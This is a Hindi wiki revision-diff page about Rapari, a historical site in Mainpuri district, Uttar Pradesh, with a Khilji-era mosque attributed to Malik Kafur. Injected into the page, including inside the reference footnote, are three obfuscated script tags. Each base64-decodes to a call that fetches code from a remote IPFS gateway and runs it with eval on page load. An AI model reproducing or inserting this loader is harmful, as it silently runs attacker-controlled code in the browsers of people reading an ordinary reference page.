Difference between revisions of "रापरी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "हुयी " to "हुई ")
 
Line 1: Line 1:
 
'''रापरी''' [[उत्तर प्रदेश]] में [[मैनपुरी ज़िला|मैनपुरी ज़िले]] की तहसील शिकोहाबाद में स्थित एक ऐतिहासिक स्थान है। यहाँ पर [[ख़िलजी वंश|ख़िलजी]] सुल्तान [[अलाउद्दीन ख़िलजी]] के ज़माने की एक मस्जिद है, जिसे [[मलिक काफ़ूर]] ने बनवाया था।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=ऐतिहासिक स्थानावली|लेखक=विजयेन्द्र कुमार माथुर|अनुवादक= |आलोचक= |प्रकाशक=राजस्थान हिन्दी ग्रंथ अकादमी, जयपुर|संकलन= भारतकोश पुस्तकालय|संपादन= |पृष्ठ संख्या=786|url=}}</ref>
 
'''रापरी''' [[उत्तर प्रदेश]] में [[मैनपुरी ज़िला|मैनपुरी ज़िले]] की तहसील शिकोहाबाद में स्थित एक ऐतिहासिक स्थान है। यहाँ पर [[ख़िलजी वंश|ख़िलजी]] सुल्तान [[अलाउद्दीन ख़िलजी]] के ज़माने की एक मस्जिद है, जिसे [[मलिक काफ़ूर]] ने बनवाया था।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=ऐतिहासिक स्थानावली|लेखक=विजयेन्द्र कुमार माथुर|अनुवादक= |आलोचक= |प्रकाशक=राजस्थान हिन्दी ग्रंथ अकादमी, जयपुर|संकलन= भारतकोश पुस्तकालय|संपादन= |पृष्ठ संख्या=786|url=}}</ref>
  
*[[शर्की वंश|शर्की]] सुल्तान [[ख़्वाजा जहान]] के राज्य की सीमाएँ '[[कोल]]', '[[सम्भल]]' तथा 'रापरी' तक फैली हुयी थीं।
+
*[[शर्की वंश|शर्की]] सुल्तान [[ख़्वाजा जहान]] के राज्य की सीमाएँ '[[कोल]]', '[[सम्भल]]' तथा 'रापरी' तक फैली हुई थीं।
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक= प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक= प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}

Latest revision as of 07:39, 7 November 2017

rapari uttar pradesh mean mainapuri zile ki tahasil shikohabad mean sthit ek aitihasik sthan hai. yahaan par khilaji sultan alauddin khilaji ke zamane ki ek masjid hai, jise malik kafoor ne banavaya tha.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. aitihasik sthanavali |lekhak: vijayendr kumar mathur |prakashak: rajasthan hindi granth akadami, jayapur |sankalan: bharatakosh pustakalay |prishth sankhya: 786 | <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh